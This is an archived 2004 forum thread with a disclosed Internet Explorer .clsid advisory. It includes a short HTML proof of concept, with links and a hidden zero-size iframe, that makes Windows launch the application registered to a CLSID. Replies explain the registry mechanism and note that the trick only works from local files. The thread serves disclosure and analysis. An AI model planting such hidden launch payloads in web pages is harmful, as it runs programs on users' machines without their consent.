Internet Explorer .clsid Vulnerability

Full Version: Internet Explorer .clsid Vulnerability

GovernmentSecurity.org > The Archives > Exploit Articles

toska

May 20 2004, 10:01 PM

advisory#5
/---------------------------------------------------------------------------/

Vendor: Microsoft Corp.
product: windows XP
test machine: winxp.pro.ed IE.6 (Fully Patched)
Discovery by: Roozbeh Afrasiabi (roozbeh_afrasiabi(at)yahoo(dot)com)
Title: Internet explorer .clsid vulnerability
local: yes
/---------------------------------------------------------------------------/

TABLE OF CONTENTS:
==================

Description..............................................1

POC......................................................2

Contact info.............................................3

Disclaimer...............................................4

1)Description
================

CLSIDs are used by windows and other MS products in many different
ways,these CLSIDs are linked to folders,applications,files,...

When CLSIDs that are linked to executables are used as the extension
of existing or non existing files in html pages Internet explorer
would execute the application linked to these CLSIDs , in addition
existing files with CLSIDs linked to apps would execute too when they
are accessed directly.

2)poc
================

<a href=Roozbeh.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}>dose not exist!</a>

<a href=.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}>dose not exist!</a>

<a href=.{FB7199AB-79BF-11d2-8D94-0000F875C541}>dose not exist!</a>

<iframe id="Target" width="0" height="0" src=".{3E9BAF2D-7A79-11d2-9334-0000F875AE17}"
name="Target" scrolling="yes">
</iframe>

3)Contact Info
==================

(roozbeh_afrasiabi(at)yahoo(dot)com)
(da_stone_cold_killer(at)yahoo(dot)com)

qcred11

May 21 2004, 03:01 PM

This is nice one. Thanks

qcred11

May 21 2004, 07:47 PM

This is interesting...

QUOTE

This is actually a behavior that is part of Windows Explorer, not
Internet Explorer. I think we have covered this in the past on lists as
well. If it is not already documented somewhere it should be, as this is
how Windows file queries (inside IE) are performed on the local file
system.

Basically, you must first circumvent security zone restrictions and gain
access to execute HTML files from the local file system in the first
place before this is an issue. At this time, it is much more interesting
to use your newly gained privileges to plant an EXE file and execute it
instead of just launching the already installed applications.

When your HTML document is opened from the local file system, it's
working directory is C:\DIR\test.html ( equivelant to the URL
FILE://C:/DIR/test.html ). If you click on a link to "XX" from here or
have it open automatically through an iframe, the browser asks for
FILE://C:/DIR/XX ( "XX" through the FILE protocol from the C:/ host in
the DIR directory ).

In this case, we are asking the browser to retrieve
"FILE://C:/DIR/Roozbeh.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}". IE
queries
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints\C to
see if the Host is known (btw, all temporary NetBIOS sessions are stored
here as integers, my currently open share in the dirty network to
\\someserver\c$ is labelled 6 instead of C). It then checks both HKCU
and HKCR in order for instances of that GUID and eventually finds
"C:\PROGRA~1\NETMEE~1\conf.exe" in
HKCR\CLSID\{3E9BAF2D-7A79-11d2-9334-0000F875AE17}\LocalServer32\(Default
) which it then launches.

You can see this entire registry brawl at
http://jscript.dk/2004/5/clsid.regmon.log

If you try to test your POC from an Internet or Intranet site you will
see that the browser simply asks for a document on the server and in
return gets a 404 Not Found.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@pivx.com

chris105

May 21 2004, 09:03 PM

So this isnt very useful then by the looks of things, ah well thanks for posting anyway. Am i right in saying you need someone to run the .html by double clicking it and not just viewing the web page ?

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.